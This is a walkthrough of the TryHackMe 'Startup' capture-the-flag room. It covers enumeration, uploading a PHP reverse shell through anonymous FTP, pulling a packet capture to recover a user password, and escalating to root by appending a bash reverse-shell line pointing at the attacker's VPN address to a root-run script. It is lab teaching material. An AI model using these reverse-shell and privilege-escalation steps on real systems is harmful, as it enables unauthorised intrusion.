Posts Tryhackme - Startup
Post
Cancel

Tryhackme - Startup


Startup is a Tryhackme room which is focused on file-upload vulnerability. The final objective is to get the user and the root flag


cover_image

Authorr1gormort1s
DescriptionAbuse traditional vulnerabilities via untraditional means

Deploy the VM and let's go.

Finding the secret recipe


First up is enumeration.

nmap -T4 -sV -sC -vv --min-rate=100000 10.10.10.208


nmap_scan
From the nmap scan we can see that Anonymous login is allowed in ftp service.
ftp_login
I saw two files and a folder. The text file is just a message and there was no information in the image. Even inside the folder there was nothing…I was like..”then why is the ftp service even open”.

Then I tried enumerating the http service and found this in the source page.
home_page_comment
It didn’t make any sense so, I used gobuster to bruteforce the directories.
gobuster
hint
I saw the hint and found that the dir is the same as the folder in ftp service.
ftp_http
Get a copy of php reverse shell and change the ip and the port values. In Kali linux the php reverse shell can be found in the location /usr/share/webshells/php/php-reverse-shell.php
reverse_shell


So, I logged into the ftp service again and uploaded the php reverse shell in the /ftp directory.

put file-name


upload
If you go to the /ftp directory in the webpage you can see the reverse shell.
reverse_shell_page

Open a netcat listener and click on the reverse shell.
shell

The answer to the first question can be found in the text file located in the root(“/”) directory.
recipe

User flag


Use the find command to get more information about the files that can be much use.

find / -user www-data 2>/dev/null


find1
Go to the folder and download the file by running this on the remote machine

python -m SimpleHTTPServer 8080


And this on the local machine

wget http://remote-machine-ip:8080/file-name.pcapng


In this file, I found the password for the username lennie.

 strings file-name.pcapng


passwd_lennie
Log in with the username lennie using su lennie

We can get the user flag from the home directoy of lennie
user_flag

Root flag


I found nothing useful in the directory /Documents. But inside the /scripts directory I saw a interesting file.
planner_script

From the image we can see that the file is owned by root and it executes another file. This file is owned by lennie.
print_script

So, it seems that planner.sh (which cannot be edited by lennie) runs print.sh (which can be edited by lennie). So root shell can be obtained by editing the print.sh file.

Append the reverse shell payload into the print.sh file

 echo "bash -i /dev/tcp/your-vpn-ip-addr/4444 0>&1" >> /etc/print.sh


Open a netcat listener in your local machine and wait for a minute to get the reverse shell


root_flag

There we go!!! Root flag obtained.

That’s it folks. Happy Hacking!!!

This post is licensed under CC BY 4.0 by the author.